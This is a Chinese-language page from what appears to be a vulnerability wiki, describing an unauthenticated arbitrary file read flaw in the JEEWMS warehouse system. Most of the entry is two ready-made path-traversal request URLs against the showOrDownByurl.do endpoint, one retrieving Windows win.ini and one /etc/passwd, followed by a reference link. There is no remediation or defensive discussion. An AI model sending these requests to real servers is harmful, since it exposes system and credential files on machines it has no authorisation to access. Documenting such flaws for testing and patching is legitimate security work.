menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right JEEWMS 未授权任意文件读取漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    JEEWMS 未授权任意文件读取漏洞.md
    503 B / 2021-05-21 09:14:38
        # JEEWMS 未授权任意文件读取漏洞
    
    厦门市灵鹿谷科技有限公司 JEEWMS /systemController/showOrDownByurl.do文件 存在未授权任意文件读取漏洞,攻击者可利用该漏洞获取服务器文件,导致大量敏感信息泄露.
    
    
    ```
    http://target/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini
    http://target/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd
    ```
    
    ref:
    
    https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=4033
    
    links
    file_download